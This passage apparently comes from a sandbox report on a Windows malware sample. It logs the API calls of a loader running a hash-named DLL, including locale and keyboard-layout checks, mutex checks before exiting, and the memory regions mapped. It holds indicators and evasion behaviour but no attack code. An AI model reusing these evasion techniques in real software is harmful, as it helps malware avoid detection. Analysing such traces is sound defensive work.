[0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0105.710] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0105.710] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0105.711] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0105.712] GetProcessHeap () returned 0x5b0000 [0105.712] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x5b0000) returned 1 [0105.997] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0105.998] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0105.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1000) returned 0x2d25030 [0106.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xe) returned 0x5c9120 [0106.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PauseW", cchWideChar=-1, lpMultiByteStr=0x5c9120, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PauseW", lpUsedDefaultChar=0x0) returned 7 [0106.000] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="\x10Ð¥\x03") returned 0x0 [0106.000] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="PauseW") returned 0x7ffc45e911f0 [0106.001] GetActiveWindow () returned 0x0 [0106.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0106.004] GetSystemDefaultLangID () returned 0x409 [0106.004] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0106.004] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0106.004] GetProcessHeap () returned 0x5b0000 [0106.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8) returned 0x5b3ca0 [0106.004] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0106.004] GetKeyboardLayoutList (in: nBuff=1, lpList=0x5b3ca0 | out: lpList=0x5b3ca0) returned 1 [0106.004] GetProcessHeap () returned 0x5b0000 [0106.004] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b3ca0 | out: hHeap=0x5b0000) returned 1 [0106.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0106.005] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0106.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0106.005] GetLastError () returned 0x0 [0106.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0106.005] CloseHandle (hObject=0x17c) returned 1 [0106.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0106.005] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0106.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0106.006] GetLastError () returned 0xb7 [0106.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0106.006] CloseHandle (hObject=0x17c) returned 1 [0106.006] ExitProcess (uExitCode=0x1) [0106.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc2c0 | out: hHeap=0x5b0000) returned 1 [0106.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5ab0 | out: hHeap=0x5b0000) returned 1 [0106.008] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0106.008] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0106.008] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0106.008] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0106.008] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0106.008] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0106.009] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7090 | out: hHeap=0x5b0000) returned 1 [0106.009] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0106.009] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0106.010] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 17 os_tid = 0x11e0 Process: id = "5" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x29983000" os_pid = "0x13f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 508 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 509 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 510 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 511 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 512 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 513 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 514 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 515 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 516 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 517 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 518 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 519 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 520 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 521 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 522 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 523 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 524 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 525 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 526 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 527 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 528 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 530 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 531 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 532 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 533 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 534 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 535 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 536 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 537 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 538 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 539 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 540 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 541 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 542 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 543 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 544 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 546 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 547 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 548 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 549 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 550 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 551 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 552 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 553 start_va = 0x1e10000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 554 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 556 start_va = 0x1e10000 end_va = 0x1ecffff monitored = 0 entry_point = 0x1e30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 557 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 558 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 559 start_va = 0x1e10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 560 start_va = 0x2000000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 561 start_va = 0x2200000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 562 start_va = 0x2600000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 564 start_va = 0x2e00000 end_va = 0x3dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 634 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 636 start_va = 0x3dd0000 end_va = 0x4106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 691 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 692 start_va = 0x4110000 end_va = 0x43a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 706 start_va = 0x4110000 end_va = 0x4259fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 714 start_va = 0x4110000 end_va = 0x42dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 1178 start_va = 0x4110000 end_va = 0x569ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 1290 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1291 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1292 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1293 start_va = 0x4110000 end_va = 0x42defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 1303 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1304 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1305 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1310 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1313 start_va = 0x4110000 end_va = 0x4271fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 1318 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 18 os_tid = 0x13f0 [0083.292] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.292] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0083.292] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.292] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0083.292] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0083.293] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.293] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0083.294] GetProcessHeap () returned 0x430000 [0083.294] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.294] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0083.294] GetLastError () returned 0x7e [0083.294] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0083.294] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0083.294] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x43c300 [0083.294] SetLastError (dwErrCode=0x7e) [0083.295] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x443450 [0083.297] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0083.297] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.297] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.297] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" [0083.297] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" [0083.297] GetACP () returned 0x4e4 [0083.297] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x435360 [0083.297] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.298] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0083.298] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0083.298] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" 